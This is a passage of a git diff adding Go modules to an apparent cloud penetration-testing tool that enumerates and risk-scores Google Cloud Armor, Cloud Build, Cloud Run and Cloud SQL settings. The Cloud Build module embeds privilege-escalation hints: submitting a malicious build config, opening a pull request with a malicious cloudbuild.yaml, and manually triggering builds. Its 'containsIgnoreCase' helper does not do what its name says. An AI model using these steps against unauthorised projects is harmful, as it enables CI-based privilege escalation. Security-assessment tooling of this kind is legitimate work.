rule.RateLimitOptions.RateLimitThreshold.IntervalSec + } + } + + sp.Rules = append(sp.Rules, sr) + } + + // Find attached resources (backend services using this policy) + sp.AttachedResources = s.findAttachedResources(ctx, service, projectID, policy.Name) + + // Analyze for weaknesses + sp.RiskLevel, sp.RiskReasons, sp.Weaknesses = s.analyzePolicy(sp) + + policies = append(policies, sp) + } + + return policies, nil +} + +// findAttachedResources finds backend services using this security policy +func (s *CloudArmorService) findAttachedResources(ctx context.Context, service *compute.Service, projectID, policyName string) []string { + var resources []string + + // Check backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, bs := range backendServices.Items { + if bs.SecurityPolicy != "" && strings.HasSuffix(bs.SecurityPolicy, "/"+policyName) { + resources = append(resources, fmt.Sprintf("backend-service:%s", bs.Name)) + } + } + } + + return resources +} + +// analyzePolicy checks for security weaknesses in the policy +func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) (string, []string, []string) { + var reasons []string + var weaknesses []string + score := 0 + + // Check if policy is attached to anything + if len(policy.AttachedResources) == 0 { + weaknesses = append(weaknesses, "Policy not attached to any backend service - not protecting anything") + score += 1 + } else { + reasons = append(reasons, fmt.Sprintf("Protecting %d resource(s)", len(policy.AttachedResources))) + } + + // Check for overly permissive rules + hasDefaultAllow := false + hasDenyRules := false + previewOnlyCount := 0 + allowAllIPsCount := 0 + + for _, rule := range policy.Rules { + if rule.Priority == 2147483647 && rule.Action == "allow" { + hasDefaultAllow = true + } + if strings.HasPrefix(rule.Action, "deny") { + hasDenyRules = true + } + if rule.Preview { + previewOnlyCount++ + } + // Check for allow rules that match all IPs + if rule.Action == "allow" && (rule.Match == "*" || rule.Match == "srcIpRanges: *" || + strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { + allowAllIPsCount++ + } + } + + if hasDefaultAllow && !hasDenyRules { + weaknesses = append(weaknesses, "Default allow rule with no deny rules - policy does nothing useful") + score += 2 + } + + if previewOnlyCount > 0 { + weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode - not actively blocking", previewOnlyCount)) + score += 1 + } + + if allowAllIPsCount > 0 && !hasDenyRules { + weaknesses = append(weaknesses, "Has allow-all rules without deny rules - effectively no protection") + score += 2 + } + + // Check adaptive protection + if !policy.AdaptiveProtection { + weaknesses = append(weaknesses, "Adaptive protection not enabled - reduced DDoS defense") + score += 1 + } else { + reasons = append(reasons, "Adaptive protection enabled") + } + + // Check for common WAF bypass patterns + hasOWASPRules := false + hasGeoRules := false + hasBotRules := false + + for _, rule := range policy.Rules { + matchLower := strings.ToLower(rule.Match) + if strings.Contains(matchLower, "sqli") || strings.Contains(matchLower, "xss") || + strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { + hasOWASPRules = true + } + if strings.Contains(matchLower, "origin.region_code") { + hasGeoRules = true + } + if strings.Contains(matchLower, "request.headers") && + (strings.Contains(matchLower, "user-agent") || strings.Contains(matchLower, "bot")) { + hasBotRules = true + } + } + + if !hasOWASPRules { + weaknesses = append(weaknesses, "No OWASP/WAF rules detected (SQLi, XSS, RCE, LFI)") + } + + if len(policy.Rules) > 0 { + reasons = append(reasons, fmt.Sprintf("Has %d rule(s)", len(policy.Rules))) + } + + if hasGeoRules { + reasons = append(reasons, "Has geo-blocking rules") + } + + if hasBotRules { + reasons = append(reasons, "Has bot protection rules") + } + + // Determine risk level based on weaknesses + if score >= 4 { + return "HIGH", reasons, weaknesses + } else if score >= 2 { + return "MEDIUM", reasons, weaknesses + } else if score >= 1 { + return "LOW", reasons, weaknesses + } + return "INFO", reasons, weaknesses +} + +// GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection +func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]string, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var unprotected []string + + // Get all backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, bs := range backendServices.Items { + if bs.SecurityPolicy == "" { + unprotected = append(unprotected, bs.Name) + } + } + + return unprotected, nil +} diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go new file mode 100644 index 00000000..278a10e2 --- /dev/null +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -0,0 +1,396 @@ +package cloudbuildservice + +import ( + "context" + "fmt" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudbuild "google.golang.org/api/cloudbuild/v1" +) + +type CloudBuildService struct { + session *gcpinternal.SafeSession +} + +// New creates a new CloudBuildService +func New() *CloudBuildService { + return &CloudBuildService{} +} + +// NewWithSession creates a CloudBuildService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudBuildService { + return &CloudBuildService{session: session} +} + +// TriggerInfo represents a Cloud Build trigger +type TriggerInfo struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + Disabled bool `json:"disabled"` + CreateTime string `json:"createTime"` + + // Source configuration + SourceType string `json:"sourceType"` // github, cloud_source_repos, etc. + RepoName string `json:"repoName"` + BranchName string `json:"branchName"` + TagName string `json:"tagName"` + + // Build configuration + BuildConfigType string `json:"buildConfigType"` // yaml, dockerfile, inline + Filename string `json:"filename"` // cloudbuild.yaml path + ServiceAccount string `json:"serviceAccount"` // SA used for builds + Substitutions map[string]string `json:"substitutions"` + + // Security analysis + IsPublicRepo bool `json:"isPublicRepo"` + HasSecrets bool `json:"hasSecrets"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// BuildInfo represents a Cloud Build execution +type BuildInfo struct { + ID string `json:"id"` + ProjectID string `json:"projectId"` + Status string `json:"status"` + CreateTime string `json:"createTime"` + StartTime string `json:"startTime"` + FinishTime string `json:"finishTime"` + TriggerID string `json:"triggerId"` + Source string `json:"source"` + ServiceAccount string `json:"serviceAccount"` + LogsBucket string `json:"logsBucket"` + Images []string `json:"images"` + // Pentest-specific fields + BuildSteps []BuildStep `json:"buildSteps"` + SecretEnvVars []string `json:"secretEnvVars"` + Artifacts []string `json:"artifacts"` +} + +// BuildStep represents a single step in a Cloud Build +type BuildStep struct { + Name string `json:"name"` // Container image + Args []string `json:"args"` // Command arguments + Entrypoint string `json:"entrypoint"` // Custom entrypoint + Env []string `json:"env"` // Environment variables + SecretEnv []string `json:"secretEnv"` // Secret environment variables + Volumes []string `json:"volumes"` // Mounted volumes +} + +// TriggerSecurityAnalysis contains detailed security analysis +type TriggerSecurityAnalysis struct { + TriggerName string `json:"triggerName"` + ProjectID string `json:"projectId"` + ServiceAccount string `json:"serviceAccount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + PrivescPotential bool `json:"privescPotential"` +} + +// ListTriggers retrieves all Cloud Build triggers in a project +func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error) { + ctx := context.Background() + var service *cloudbuild.Service + var err error + + if s.session != nil { + service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = cloudbuild.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Build service: %v", err) + } + + var triggers []TriggerInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Triggers.List(parent) + err = req.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err != nil { + // Try with just project ID (older API) + req2 := service.Projects.Triggers.List(projectID) + err2 := req2.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err2 != nil { + return nil, fmt.Errorf("failed to list triggers: %v", err) + } + } + + return triggers, nil +} + +// ListBuilds retrieves recent Cloud Build executions +func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildInfo, error) { + ctx := context.Background() + var service *cloudbuild.Service + var err error + + if s.session != nil { + service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = cloudbuild.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Build service: %v", err) + } + + var builds []BuildInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Builds.List(parent).PageSize(limit) + resp, err := req.Do() + if err != nil { + // Try with just project ID + req2 := service.Projects.Builds.List(projectID).PageSize(limit) + resp, err = req2.Do() + if err != nil { + return nil, fmt.Errorf("failed to list builds: %v", err) + } + } + + for _, build := range resp.Builds { + info := BuildInfo{ + ID: build.Id, + ProjectID: projectID, + Status: build.Status, + CreateTime: build.CreateTime, + StartTime: build.StartTime, + FinishTime: build.FinishTime, + ServiceAccount: build.ServiceAccount, + LogsBucket: build.LogsBucket, + Images: build.Images, + } + if build.BuildTriggerId != "" { + info.TriggerID = build.BuildTriggerId + } + if build.Source != nil && build.Source.RepoSource != nil { + info.Source = build.Source.RepoSource.RepoName + } + + // Parse build steps for pentest analysis + for _, step := range build.Steps { + if step == nil { + continue + } + bs := BuildStep{ + Name: step.Name, + Args: step.Args, + Entrypoint: step.Entrypoint, + Env: step.Env, + SecretEnv: step.SecretEnv, + } + for _, vol := range step.Volumes { + if vol != nil { + bs.Volumes = append(bs.Volumes, vol.Name+":"+vol.Path) + } + } + info.BuildSteps = append(info.BuildSteps, bs) + info.SecretEnvVars = append(info.SecretEnvVars, step.SecretEnv...) + } + + // Parse artifacts + if build.Artifacts != nil { + info.Artifacts = build.Artifacts.Images + } + + builds = append(builds, info) + } + + return builds, nil +} + +// AnalyzeTriggerForPrivesc performs detailed privesc analysis on a trigger +func (s *CloudBuildService) AnalyzeTriggerForPrivesc(trigger TriggerInfo, projectID string) TriggerSecurityAnalysis { + analysis := TriggerSecurityAnalysis{ + TriggerName: trigger.Name, + ProjectID: projectID, + ServiceAccount: trigger.ServiceAccount, + RiskReasons: []string{}, + } + + score := 0 + + // Check service account privileges + if trigger.ServiceAccount == "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Uses default Cloud Build SA (often has broad permissions)") + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Default SA often has: storage.admin, source.admin, artifactregistry.admin\n"+ + "gcloud builds submit --config=malicious.yaml --project=%s", projectID)) + score += 2 + analysis.PrivescPotential = true + } else { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Build runs as: %s\n"+ + "# Check SA permissions:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", + trigger.ServiceAccount, projectID, trigger.ServiceAccount)) + } + + // GitHub PR triggers are exploitable + if trigger.SourceType == "github" && trigger.BranchName != "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "GitHub trigger may execute code from pull requests") + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# Fork repo, submit PR with malicious cloudbuild.yaml to trigger build") + score += 2 + } + + // Inline build configs might leak secrets + if trigger.BuildConfigType == "inline" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Inline build config may contain hardcoded secrets or commands") + score += 1 + } + + // Secrets in substitutions + if trigger.HasSecrets { + analysis.RiskReasons = append(analysis.RiskReasons, + "Trigger uses substitution variables that may contain secrets") + score += 1 + } + + // Add exploitation guidance + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Trigger a build manually:\n"+ + "gcloud builds triggers run %s --project=%s --branch=%s", + trigger.ID, projectID, trigger.BranchName)) + + if score >= 3 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else { + analysis.RiskLevel = "LOW" + } + + return analysis +} + +// parseTrigger converts a trigger to TriggerInfo +func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, projectID string) TriggerInfo { + info := TriggerInfo{ + ID: trigger.Id, + Name: trigger.Name, + Description: trigger.Description, + ProjectID: projectID, + Disabled: trigger.Disabled, + CreateTime: trigger.CreateTime, + Substitutions: trigger.Substitutions, + RiskReasons: []string{}, + } + + // Parse source configuration + if trigger.Github != nil { + info.SourceType = "github" + info.RepoName = fmt.Sprintf("%s/%s", trigger.Github.Owner, trigger.Github.Name) + if trigger.Github.Push != nil { + info.BranchName = trigger.Github.Push.Branch + info.TagName = trigger.Github.Push.Tag + } + if trigger.Github.PullRequest != nil { + info.BranchName = trigger.Github.PullRequest.Branch + } + } else if trigger.TriggerTemplate != nil { + info.SourceType = "cloud_source_repos" + info.RepoName = trigger.TriggerTemplate.RepoName + info.BranchName = trigger.TriggerTemplate.BranchName + info.TagName = trigger.TriggerTemplate.TagName + } + + // Parse build configuration + if trigger.Filename != "" { + info.BuildConfigType = "yaml" + info.Filename = trigger.Filename + } else if trigger.Build != nil { + info.BuildConfigType = "inline" + } + + // Service account + if trigger.ServiceAccount != "" { + info.ServiceAccount = trigger.ServiceAccount + } + + // Check for secrets in substitutions + for key := range trigger.Substitutions { + if containsSecretKeyword(key) { + info.HasSecrets = true + break + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeTriggerRisk(info) + + return info +} + +// containsSecretKeyword checks if a key might contain secrets +func containsSecretKeyword(key string) bool { + secretKeywords := []string{"SECRET", "PASSWORD", "TOKEN", "KEY", "CREDENTIAL", "AUTH"} + for _, keyword := range secretKeywords { + if containsIgnoreCase(key, keyword) { + return true + } + } + return false +} + +func containsIgnoreCase(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || + len(s) > len(substr) && (s[:len(substr)] == substr || s[len(s)-len(substr):] == substr)) +} + +// analyzeTriggerRisk determines the risk level of a trigger +func (s *CloudBuildService) analyzeTriggerRisk(trigger TriggerInfo) (string, []string) { + var reasons []string + score := 0 + + // Public repo triggers could be exploited + if trigger.SourceType == "github" && trigger.IsPublicRepo { + reasons = append(reasons, "Triggers from public GitHub repository") + score += 2 + } + + // Inline build configs might contain sensitive info + if trigger.BuildConfigType == "inline" { + reasons = append(reasons, "Uses inline build configuration") + score += 1 + } + + // Pull request triggers could be exploited by external PRs + if trigger.BranchName != "" && trigger.SourceType == "github" { + reasons = append(reasons, "PR-triggered builds may execute untrusted code") + score += 1 + } + + // No specific service account means using default (often over-privileged) + if trigger.ServiceAccount == "" { + reasons = append(reasons, "Uses default Cloud Build service account") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go new file mode 100644 index 00000000..55e459dd --- /dev/null +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -0,0 +1,359 @@ +package cloudrunservice + +import ( + "context" + "fmt" + "strings" + + run "google.golang.org/api/run/v2" +) + +type CloudRunService struct{} + +func New() *CloudRunService { + return &CloudRunService{} +} + +// ServiceInfo holds Cloud Run service details with security-relevant information +type ServiceInfo struct { + // Basic info + Name string + ProjectID string + Region string + Description string + Creator string + UpdateTime string + + // URL and traffic + URL string + LatestRevision string + LatestReadyRevision string + TrafficAllOnLatest bool + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // INGRESS_TRAFFIC_ALL, INGRESS_TRAFFIC_INTERNAL_ONLY, INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER + VPCAccess string // VPC Connector or Direct VPC + VPCEgressSettings string // ALL_TRAFFIC, PRIVATE_RANGES_ONLY + BinaryAuthorizationPolicy string + + // Container configuration + ContainerImage string + ContainerPort int64 + CPULimit string + MemoryLimit string + MaxInstances int64 + MinInstances int64 + Timeout string + + // Environment variables (counts, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // IAM + InvokerMembers []string + IsPublic bool +} + +// JobInfo holds Cloud Run job details +type JobInfo struct { + Name string + ProjectID string + Region string + ServiceAccount string + ContainerImage string + LastExecution string + Creator string + UpdateTime string + + // Configuration + TaskCount int64 + Parallelism int64 + MaxRetries int64 + Timeout string + + // Environment + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int +} + +// Services retrieves all Cloud Run services in a project across all regions +func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { + ctx := context.Background() + + service, err := run.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %v", err) + } + + var services []ServiceInfo + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Services.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + info := parseServiceInfo(svc, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := cs.getServiceIAMPolicy(service, svc.Name) + if iamErr == nil && iamPolicy != nil { + info.InvokerMembers, info.IsPublic = parseInvokerBindings(iamPolicy) + } + + services = append(services, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list services: %v", err) + } + + return services, nil +} + +// Jobs retrieves all Cloud Run jobs in a project across all regions +func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := run.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %v", err) + } + + var jobs []JobInfo + + // List jobs across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Jobs.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list jobs: %v", err) + } + + return jobs, nil +} + +// parseServiceInfo extracts relevant information from a Cloud Run service +func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) ServiceInfo { + info := ServiceInfo{ + Name: extractName(svc.Name), + ProjectID: projectID, + Description: svc.Description, + Creator: svc.Creator, + UpdateTime: svc.UpdateTime, + URL: svc.Uri, + } + + // Extract region from service name + // Format: projects/{project}/locations/{location}/services/{name} + parts := strings.Split(svc.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Ingress settings + info.IngressSettings = svc.Ingress + + // Latest revision info + info.LatestRevision = svc.LatestCreatedRevision + info.LatestReadyRevision = svc.LatestReadyRevision + + // Check if all traffic goes to latest + for _, traffic := range svc.Traffic { + if traffic.Type == "TRAFFIC_TARGET_ALLOCATION_TYPE_LATEST" && traffic.Percent == 100 { + info.TrafficAllOnLatest = true + break + } + } + + // Binary authorization + if svc.BinaryAuthorization != nil { + info.BinaryAuthorizationPolicy = svc.BinaryAuthorization.Policy + if svc.BinaryAuthorization.UseDefault { + info.BinaryAuthorizationPolicy = "default" + } + } + + // Template configuration (current revision settings) + if svc.Template != nil { + info.ServiceAccount = svc.Template.ServiceAccount + info.Timeout = svc.Template.Timeout + + if svc.Template.Scaling != nil { + info.MaxInstances = svc.Template.Scaling.MaxInstanceCount + info.MinInstances = svc.Template.Scaling.MinInstanceCount + } + + // VPC access configuration + if svc.Template.VpcAccess != nil { + info.VPCAccess = svc.Template.VpcAccess.Connector + info.VPCEgressSettings = svc.Template.VpcAccess.Egress + if info.VPCAccess == "" && svc.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + + // Container configuration + if len(svc.Template.Containers) > 0 { + container := svc.Template.Containers[0] + info.ContainerImage = container.Image + + // Port + if len(container.Ports) > 0 { + info.ContainerPort = container.Ports[0].ContainerPort + } + + // Resources + if container.Resources != nil { + if container.Resources.Limits != nil { + if cpu, ok := container.Resources.Limits["cpu"]; ok { + info.CPULimit = cpu + } + if mem, ok := container.Resources.Limits["memory"]; ok { + info.MemoryLimit = mem + } + } + } + + // Environment variables (count only) + info.EnvVarCount = len(container.Env) + + // Count secret environment variables + for _, env := range container.Env { + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + info.SecretEnvVarCount++ + } + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + // Check if this volume is a secret + for _, svcVol := range svc.Template.Volumes { + if svcVol.Name == vol.Name && svcVol.Secret != nil { + info.SecretVolumeCount++ + break + } + } + } + } + } + + return info +} + +// parseJobInfo extracts relevant information from a Cloud Run job +func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Creator: job.Creator, + UpdateTime: job.UpdateTime, + } + + // Extract region from job name + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Last execution + if job.LatestCreatedExecution != nil { + info.LastExecution = job.LatestCreatedExecution.Name + } + + // Template configuration + if job.Template != nil { + info.TaskCount = job.Template.TaskCount + info.Parallelism = job.Template.Parallelism + + if job.Template.Template != nil { + info.MaxRetries = job.Template.Template.MaxRetries + info.Timeout = job.Template.Template.Timeout + info.ServiceAccount = job.Template.Template.ServiceAccount + + // Container configuration + if len(job.Template.Template.Containers) > 0 { + container := job.Template.Template.Containers[0] + info.ContainerImage = container.Image + + // Environment variables (count only) + info.EnvVarCount = len(container.Env) + + // Count secret environment variables + for _, env := range container.Env { + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + info.SecretEnvVarCount++ + } + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + for _, jobVol := range job.Template.Template.Volumes { + if jobVol.Name == vol.Name && jobVol.Secret != nil { + info.SecretVolumeCount++ + break + } + } + } + } + } + } + + return info +} + +// getServiceIAMPolicy retrieves the IAM policy for a Cloud Run service +func (cs *CloudRunService) getServiceIAMPolicy(service *run.Service, serviceName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Services.GetIamPolicy(serviceName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseInvokerBindings extracts who can invoke the service and checks for public access +func parseInvokerBindings(policy *run.GoogleIamV1Policy) ([]string, bool) { + var invokers []string + isPublic := false + + for _, binding := range policy.Bindings { + // Check for invoker role + if binding.Role == "roles/run.invoker" { + invokers = append(invokers, binding.Members...) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + } + } + } + } + + return invokers, isPublic +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go new file mode 100644 index 00000000..9bdad65b --- /dev/null +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -0,0 +1,267 @@ +package cloudsqlservice + +import ( + "context" + "fmt" + "strings" + + sqladmin "google.golang.org/api/sqladmin/v1" +) + +type CloudSQLService struct{} + +func New() *CloudSQLService { + return &CloudSQLService{} +} + +// SQLInstanceInfo holds Cloud SQL instance details with security-relevant information +type SQLInstanceInfo struct { + // Basic info + Name string + ProjectID string + Region string + DatabaseVersion string + Tier string + State string + + // Network configuration + PublicIP string + PrivateIP string + HasPublicIP bool + AuthorizedNetworks []AuthorizedNetwork + RequireSSL bool + SSLMode string + + // Security configuration + ServiceAccountEmail string + RootPasswordSet bool + PasswordPolicyEnabled bool + IAMAuthentication bool + + // Backup configuration + BackupEnabled bool + BinaryLogEnabled bool + BackupLocation string + PointInTimeRecovery bool + RetentionDays int + + // Encryption + KMSKeyName string + EncryptionType string // Google-managed or CMEK + + // High Availability + AvailabilityType string // REGIONAL or ZONAL + FailoverReplica string + + // Maintenance + MaintenanceWindow string + + // Databases (if enumerated) + Databases []string + + // Security issues detected + SecurityIssues []string +} + +// AuthorizedNetwork represents a network authorized to connect +type AuthorizedNetwork struct { + Name string + Value string // CIDR + IsPublic bool // 0.0.0.0/0 or similar +} + +// Instances retrieves all Cloud SQL instances in a project +func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error) { + ctx := context.Background() + + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud SQL service: %v", err) + } + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, fmt.Errorf("failed to list SQL instances: %v", err) + } + + var instances []SQLInstanceInfo + for _, instance := range resp.Items { + info := parseInstanceInfo(instance, projectID) + instances = append(instances, info) + } + + return instances, nil +} + +// parseInstanceInfo extracts security-relevant information from a Cloud SQL instance +func parseInstanceInfo(instance *sqladmin.DatabaseInstance, projectID string) SQLInstanceInfo { + info := SQLInstanceInfo{ + Name: instance.Name, + ProjectID: projectID, + DatabaseVersion: instance.DatabaseVersion, + State: instance.State, + SecurityIssues: []string{}, + } + + // Region from GCE zone + if instance.GceZone != "" { + // Zone format: us-central1-a -> extract region us-central1 + parts := strings.Split(instance.GceZone, "-") + if len(parts) >= 2 { + info.Region = parts[0] + "-" + parts[1] + } + } else if instance.Region != "" { + info.Region = instance.Region + } + + // Settings + if instance.Settings != nil { + info.Tier = instance.Settings.Tier + info.AvailabilityType = instance.Settings.AvailabilityType + + // IP configuration + if instance.Settings.IpConfiguration != nil { + ipConfig := instance.Settings.IpConfiguration + info.RequireSSL = ipConfig.RequireSsl + info.SSLMode = ipConfig.SslMode + info.IAMAuthentication = ipConfig.EnablePrivatePathForGoogleCloudServices + + // Check for private IP + if ipConfig.PrivateNetwork != "" { + info.HasPublicIP = ipConfig.Ipv4Enabled + } else { + info.HasPublicIP = true // Default is public + } + + // Parse authorized networks + for _, network := range ipConfig.AuthorizedNetworks { + an := AuthorizedNetwork{ + Name: network.Name, + Value: network.Value, + } + // Check if network is public (0.0.0.0/0 or similar broad ranges) + if network.Value == "0.0.0.0/0" || + network.Value == "0.0.0.0/1" || + network.Value == "128.0.0.0/1" { + an.IsPublic = true + } + info.AuthorizedNetworks = append(info.AuthorizedNetworks, an) + } + } + + // Backup configuration + if instance.Settings.BackupConfiguration != nil { + backup := instance.Settings.BackupConfiguration + info.BackupEnabled = backup.Enabled + info.BinaryLogEnabled = backup.BinaryLogEnabled + info.BackupLocation = backup.Location + info.PointInTimeRecovery = backup.PointInTimeRecoveryEnabled + info.RetentionDays = int(backup.TransactionLogRetentionDays) + } + + // Password policy + if instance.Settings.PasswordValidationPolicy != nil { + info.PasswordPolicyEnabled = instance.Settings.PasswordValidationPolicy.EnablePasswordPolicy + } + + // Maintenance window + if instance.Settings.MaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Day %d, Hour %d", + instance.Settings.MaintenanceWindow.Day, + instance.Settings.MaintenanceWindow.Hour) + } + + // Database flags (can reveal security settings) + // These could be parsed for specific security-relevant flags + } + + // IP addresses + for _, ip := range instance.IpAddresses { + switch ip.Type { + case "PRIMARY": + info.PublicIP = ip.IpAddress + case "PRIVATE": + info.PrivateIP = ip.IpAddress + } + } + + // Service account + info.ServiceAccountEmail = instance.ServiceAccountEmailAddress + + // Disk encryption + if instance.DiskEncryptionConfiguration != nil { + info.KMSKeyName = instance.DiskEncryptionConfiguration.KmsKeyName + if info.KMSKeyName != "" { + info.EncryptionType = "CMEK" + } else { + info.EncryptionType = "Google-managed" + } + } else { + info.EncryptionType = "Google-managed" + } + + // Failover replica + if instance.FailoverReplica != nil { + info.FailoverReplica = instance.FailoverReplica.Name + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(instance SQLInstanceInfo) []string { + var issues []string + + // Public IP enabled + if instance.HasPublicIP { + issues = append(issues, "Public IP enabled") + } + + // Public IP without SSL requirement + if instance.HasPublicIP && !instance.RequireSSL { + issues = append(issues, "Public IP without SSL requirement") + } + + // Authorized networks include 0.0.0.0/0 + for _, network := range instance.AuthorizedNetworks { + if network.IsPublic { + issues = append(issues, fmt.Sprintf("Authorized network allows all IPs: %s", network.Value)) + } + } + + // No authorized networks but public IP (potentially open to all) + if instance.HasPublicIP && len(instance.AuthorizedNetworks) == 0 { + issues = append(issues, "Public IP with no authorized networks (blocked by default, but verify)") + } + + // Backups not enabled + if !instance.BackupEnabled { + issues = append(issues, "Automated backups not enabled") + } + + // Point-in-time recovery not enabled + if !instance.PointInTimeRecovery && instance.BackupEnabled { + issues = append(issues, "Point-in-time recovery not enabled") + } + + // Using Google-managed encryption (not CMEK) + if instance.EncryptionType == "Google-managed" { + // This is informational, not necessarily an issue + // issues = append(issues, "Using Google-managed encryption (not CMEK)") + } + + // Single zone deployment + if instance.AvailabilityType == "ZONAL" { + issues = append(issues, "Single zone deployment (no HA)") + } + + // Password policy not enabled + if !instance.PasswordPolicyEnabled { + issues = append(issues, "Password validation policy not enabled") + } + + return issues +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go new file mode 100644 index 00000000..75b1d9f4 --- /dev/null +++ b/gcp/services/composerService/composerService.go @@ -0,0 +1,215 @@ +package composerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + composer "google.golang.org/api/composer/v1" +) + +type ComposerService struct { + session *gcpinternal.SafeSession +} + +func New() *ComposerService { + return &ComposerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ComposerService { + return &ComposerService{session: session} +} + +// EnvironmentInfo represents a Cloud Composer environment +type EnvironmentInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Airflow config + AirflowURI 